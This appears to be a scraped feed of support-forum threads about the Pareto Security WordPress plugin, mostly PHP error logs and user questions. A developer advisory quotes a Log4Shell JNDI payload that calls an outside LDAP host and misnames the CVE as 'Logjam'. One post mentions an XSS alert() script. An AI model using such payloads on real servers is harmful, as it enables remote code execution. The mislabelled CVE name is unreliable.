Haven’t revised my debug.log for quite some time. Glancing at it now found these recurring lines:
[12-Mar-2024 20:23:11 UTC] PHP Fatal error: Maximum execution time of 300 seconds exceeded in /wp-content/plugins/pareto-security/pareto_functions.php on line 1152
[24-Apr-2024 14:01:05 UTC] PHP Warning: Cannot modify header information – headers already sent in /wp-content/plugins/pareto-security/pareto_functions.php on line 71
[16-May-2024 00:00:54 UTC] PHP Fatal error: Maximum execution time of 300 seconds exceeded in /wp-content/plugins/pareto-security/pareto_functions.php on line 1154
[18-May-2024 09:02:44 UTC] PHP Fatal error: Maximum execution time of 300 seconds exceeded in /public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 1155
]]>Hello
I am using Pareto Security for many subdomains but just on one of them Elementor does not load the first page. I saw when I deactive Pareto Security Elementor works.
Thanks
]]>Every few months, I get a strange issue that fills the debug.log with gigabytes of data in a few minutes until using all available disk space, and until I restart the PHP service and delete the said log. I haven’t been able to see what’s inside such huge debug.log, until now. Gigabytes of this:
PHP Warning: Undefined variable $remval in /wp-content/plugins/pareto-security/pareto_functions.php on line 1155I get this error msg
Got error ‘PHP message: PHP Warning: Constant DB_CHARSET already defined in /public_html/wp-config.php on line 88’, referer: /wp-admin/admin.php?page=pareto_security_settings
How can I stop it? Please feel free to help me.
]]>Tweaked crontab to use CLI instead of cURL and now these have started showing up on each cycle:PHP Warning: Undefined array key "REQUEST_METHOD" in /wp-content/plugins/pareto-security/pareto_functions.php on line 1165
PHP Warning: Undefined array key "REQUEST_METHOD" in /wp-content/plugins/pareto-security/pareto_functions.php on line 1267
Hi @te_taipo,
Been using this plugin for years, thank you.
Been getting some errors recently…
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "SERVER_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2379
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "SERVER_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2379
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "SERVER_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2379
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REMOTE_ADDR" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2948
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "SCRIPT_FILENAME" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 1992
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REQUEST_METHOD" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 890
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "SCRIPT_FILENAME" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 1992
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REQUEST_METHOD" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 1014
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REQUEST_METHOD" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 1150
[04-Feb-2023 03:30:01 UTC] PHP Warning: Undefined array key "REQUEST_METHOD" in …/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 1218
…Sean
]]>Thank you for your plugin dev.
I’ve seen this error, this am on two sites…
Undefined variable $header in…plugins/pareto-security/pareto_functions.php on line 1865
Undefined array key “” …plugins/pareto-security/pareto_functions.php on line 1865
]]>Using HetrixTools as my uptime monitor. It’s started being blocked by this plugin. Please allow.
[blocked] crawler/user-agent: 'hetrixtools uptime monitoring bot. https://hetrix.tools/uptime-monitoring-bot.html'
https://docs.hetrixtools.com/uptime-monitoring-ip-addresses/
]]>Some entries have started showing up in the debug.log after hitting the WC > home menu of the latest WC update.
PHP Warning: Undefined array key 0 in \plugins\pareto-security\pareto_functions.php on line 720
PHP Warning: Array to string conversion in \plugins\pareto-security\pareto_functions.php on line 723I’m getting these in the logs from time to time:
PHP Fatal error: Maximum execution time of 60 seconds exceeded in /plugins/pareto-security/pareto_functions.php on line 2545
Very simple and effective security plugin to stop bad crawlers and attacks.
But as soon as I installed activated this plugin in Hard Ban settings, I got website down notification from Updown.io and also from Fathom analytics (tracking.healthcarentsickcare.com). Is there any way to whitelist the crawlers?
Thank you
Vivek
I’ve switched to PHP8 on live recently. Lately noticed debug.log has started steadily filling with these:
PHP Warning: Undefined array key 109 in /plugins/pareto-security/pareto_functions.php on line 2092
PHP Warning: Undefined array key 110 in /plugins/pareto-security/pareto_functions.php on line 2095
PHP Warning: Undefined array key 110 in /plugins/pareto-security/pareto_functions.php on line 2096Is Pareto compatible with the OpenLiteSpeed Web Server (LWS)? I’m reading their .htaccess handling is rather idiosyncratic.
Logjam (CVE-2021-44228) https://nvd.nist.gov/vuln/detail/CVE-2021-44228
If your site is hosted on an Apache web server, and you are a user of Pareto Security and have Hardban settings enabled this would have and will prevent the Logjam attack from exploiting the webserver via your website.
I have also added in a filter in the latest update that prevents this attack regardless of whether or not you are using the more advanced settings in Pareto Security.
Log entries in this plugin will look like the following:
[banned] attempted attack :: user-agent: ‘${jndi:ldap://73a93a21510f.bingsearchlib.com:39356/a}’
There are variations on this attack which will all be banned by Pareto Security
]]>Hello
I am using this lovely plugin for some years.
In this week I had random “forbidden! you do not have access …”.
Today I had “A timeout occurred 524 Cloudflare ” error.
I renamed my plugin folder and I received this email.
“Since WordPress 5.2 there is a built-in feature that detects when a plugin or theme causes a fatal error on your site, and notifies you with this automated email.
In this case, WordPress caught an error with one of your plugins, Pareto Security.”
I removed the plugin temporary. The site is OK.
What is the problem?
Thanks ??
WordPress version 5.8.2
PHP version 7.4.1
]]>Today noticed getting the debug.log slowly filled with this block of entries:
PHP Warning: fopen(https://www.quic.cloud/ips): failed to open stream: Connection timed out in /wp-content/plugins/pareto-security/pareto_functions.php on line 2525
PHP Warning: stream_set_blocking() expects parameter 1 to be resource, bool given in /wp-content/plugins/pareto-security/pareto_functions.php on line 2526
PHP Warning: fread() expects parameter 1 to be resource, bool given in /wp-content/plugins/pareto-security/pareto_functions.php on line 2527
PHP Warning: fclose() expects parameter 1 to be resource, bool given in /wp-content/plugins/pareto-security/pareto_functions.php on line 2528Thanks.
]]>The plugin started blocking the server’s IP, and therefore the site became inaccessible to anyone.
I added an IP to the white list, this was enough for 10-15 minutes, then everything was blocked again.
it is necessary to manually delete the ip in htacess
Sometime ago, added define('DISALLOW_FILE_EDIT', true); in wp-config.php, as an extra security measure suggested from somewhere. Today, noticed another plugin (RankMath) complaining about how it can’t write to robots.txt, so after some investigation had to revert back to define('DISALLOW_FILE_EDIT', false);.
Is Pareto Security sensible too to the such aforementioned setting, while handling .htaccess and the banned IP’s list?
Thanks.
]]>I’m trying to fine-tune a cache plugin. Noticed PS uses NONCE’s in many places in the code. NONCE has a default TTL of ~10-24h, which means one may have to clear the page cache in that interval before it becomes invalid. That’s too often in some usage scenarios, as it may reflect negatively on the server resources during regeneration.
Does PS’s nonces are really used in the frontend, or only in wp-admin? If the former applies, is it there a different nonce TTL for PS that’s still safe for caching?
Thanks.
]]>Every other week PS is banning my home IP or the live server IP. How to put both IP’s in an allowed list, so they don’t get blocked again? Thanks.
]]>Hi @te_taipo,
Just noticed these entries in all my error logs…
[28-Oct-2020 10:10:01 UTC] PHP Fatal error: Uncaught Error: Function name must be a string in /home/oldtownweb/public_html/wp-content/plugins/pareto-security/pareto_functions.php:2341
Stack trace:
#0 /home/oldtownweb/public_html/wp-content/plugins/pareto-security/pareto_functions.php(2162): pareto_functions->getREMOTE_ADDR()
#1 /home/oldtownweb/public_html/wp-content/plugins/pareto-security/pareto_functions.php(15): pareto_functions->get_ip()
#2 /home/oldtownweb/public_html/wp-content/plugins/pareto-security/pareto_security.php(36): pareto_functions->__construct()
#3 /home/oldtownweb/public_html/wp-includes/class-wp-hook.php(286): pareto_security_init('')
#4 /home/oldtownweb/public_html/wp-includes/class-wp-hook.php(310): WP_Hook->apply_filters(NULL, Array)
#5 /home/oldtownweb/public_html/wp-includes/plugin.php(453): WP_Hook->do_action(Array)
#6 /home/oldtownweb/public_html/wp-settings.php(330): do_action('plugins_loaded')
#7 /home/oldtownweb/public_html/wp-config.php(109): require_once('/home/oldtownwe...')
#8 /home/oldtownweb/public_html/wp-load.php( in /home/oldtownweb/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2341…Sean
]]>Fresh install, no other plugins – 5.5.1 WP
Opening an external link using allow_url_open where it expects only local files looks to be creating an issue.
Is currently disabled, please consider this urgent.
[15-Oct-2020 07:58:10 UTC] PHP Warning: fopen(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2145
[15-Oct-2020 07:58:10 UTC] PHP Warning: fopen(https://www.quic.cloud/ips): failed to open stream: no suitable wrapper could be found in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2145
[15-Oct-2020 07:58:10 UTC] PHP Warning: stream_set_blocking() expects parameter 1 to be resource, bool given in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2146
[15-Oct-2020 07:58:10 UTC] PHP Warning: fread() expects parameter 1 to be resource, bool given in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2147
[15-Oct-2020 07:58:10 UTC] PHP Warning: fclose() expects parameter 1 to be resource, bool given in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2148
[15-Oct-2020 08:01:03 UTC] PHP Warning: fopen(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2145
[15-Oct-2020 08:01:03 UTC] PHP Warning: fopen(https://www.quic.cloud/ips): failed to open stream: no suitable wrapper could be found in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2145
[15-Oct-2020 08:01:03 UTC] PHP Warning: stream_set_blocking() expects parameter 1 to be resource, bool given in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2146
[15-Oct-2020 08:01:03 UTC] PHP Warning: fread() expects parameter 1 to be resource, bool given in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2147
[15-Oct-2020 08:01:03 UTC] PHP Warning: fclose() expects parameter 1 to be resource, bool given in /home/lalloo/public_html/wp-content/plugins/pareto-security/pareto_functions.php on line 2148
Got this in debug.log:
file_get_contents(https://www.quic.cloud/ips): failed to open stream: HTTP request failed! HTTP/1.0 503 Service Unavailable
in /plugins/pareto-security/pareto_functions.php on line 2196Looking at line 2196, it can be seen that’s indeed trying to resolve https://www.quic.cloud/ips via file_get_contents(), which is indeed returning a 503 error atm.
However, file_get_contents() is a blocking function that may degrade performance in situations like the above. Here’s a php script, for example, that calls a urls without blocking and returns immediately.
How does your security compare with BBQ Firewall?
It seem the similar or any difference?
Thanks
]]>What happens when an attack comes through a public-facing proxy/firewall, etc. front to potentially large number of users/customers? Just putting it on a deny list in .htaccess is denying access to a lot of people, no? How to handle this? Thanks.
Hi,
Just want to feedback the fatal error produced by my server using version 2.7.0
The error message is as follow:
PHP Fatal error: Uncaught Error: Function name must be a string in /var/www/html/wp-content/plugins/pareto-security/pareto_functions.php:2341 Stack trace: #0 /var/www/html/wp-content/plugins/pareto-security/pareto_functions.php(2162): pareto_functions->getREMOTE_ADDR() #1 /var/www/html/wp-content/plugins/pareto-security/pareto_functions.php(15): pareto_functions->get_ip() #2 /var/www/html/wp-content/plugins/pareto-security/pareto_security.php(36): pareto_functions->__construct() #3 /var/www/html/wp-includes/class-wp-hook.php(287): pareto_security_init('') #4 /var/www/html/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters(NULL, Array) #5 /var/www/html/wp-includes/plugin.php(478): WP_Hook->do_action(Array) #6 /var/www/html/wp-settings.php(403): do_action('plugins_loaded') #7 /var/www/wp-config.php(134): require_once('/var/www/html/w...') #8 /var/www/html/wp-load.php(42): require_once('/var/www/wp-con...') #9 /var/www/html/wp-cron.php(44): require_once('/var/www/html/w...') #10 {main} thrown in /var/www/html/wp-content/plugins/pareto-security/pareto_functions.php on line 2341
The error produced when running wp-cron.php – not visible due to WordPress error masking on the browser – but from the terminal php wp-cron.php creates the error.
Following the message, pareto_functions.php:2341 falls into this simple function:
/**
* getREMOTE_ADDR()
*/
function getREMOTE_ADDR() {
if ( false !== getenv( 'REMOTE_ADDR' ) &&
( false !== ( bool ) $this->string_prop( getenv( 'REMOTE_ADDR' ), 2 ) ) &&
false !== $this->check_ip( getenv( 'REMOTE_ADDR' ) ) ) {
return getenv( 'REMOTE_ADDR' );
} elseif (
false !== $_SERVER( 'REMOTE_ADDR' ) &&
( false !== ( bool ) $this->string_prop( $_SERVER( 'REMOTE_ADDR' ), 2 ) ) &&
false !== $this->check_ip( $_SERVER( 'REMOTE_ADDR' ) ) ) {
return $_SERVER[ 'REMOTE_ADDR' ];
}
}
..somewhere along the “elseif “line… so I just remark all the line as comment except ‘return $_SERVER[ ‘REMOTE_ADDR’ ];’ as a temporary measure and the error disappear. So, confirm the source.
Thanks for the great plugins !
]]>Hi @te_taipo,
I’ve been having a problem where a rule I have in .htaccess chnges every time Pareto Security updates the ip list…
<FilesMatch "^.*(error_log|debug\.log|xmlrpc\.php|wp-config\.php|php\.ini|\.[hH][tT][aApP].*)$">
order allow,deny
deny from all
</FilesMatch>becomes…
<FilesMatch "^.*(error_log|debug\.log|xmlrpc\.php|wp-config\.php|php\.ini|\.[hH][tT][aApP].*)$">
</FilesMatch>I deactivated Pareto Security on one site for two weeks. Every morning I check, and the rule changes on all sites except that one.
The only other plugin I use that writes to .htaccess is Litespeed Cache. If I update the settings, it creates a new .htaccess file, and the rule doesn’t change when that happens.
Thanks in advance,
Sean
Notice Undefined index: SERVER_ADDR
If your server is IIS you will be seeing this error in versions of Pareto Security versions 2.6.8 and earlier
This is fixed in the latest version 2.6.9
]]>Hi @te_taipo
Had an odd thing happen when navigating to settings page in Chrome (Iridium). Got a popup that says xss. It was caused by alert(“xss”) enclosed in script tags in the source code of one of the log entries. I have screen shots. Don’t see a way to add them here though.
…Sean
]]>Hi, got these today in the debug.log:
PHP Warning: array_merge(): Argument #3 is not an array in /wp-content/plugins/pareto-security/pareto_functions.php on line 696
PHP Warning: array_unique() expects parameter 1 to be array, null given in /wp-content/plugins/pareto-security/pareto_functions.php on line 697
PHP Warning: count(): Parameter must be an array or an object that implements Countable in /wp-content/plugins/pareto-security/pareto_functions.php on line 698WP and PS fully updated, on Linux/PHP7.2.
Thanks.
]]>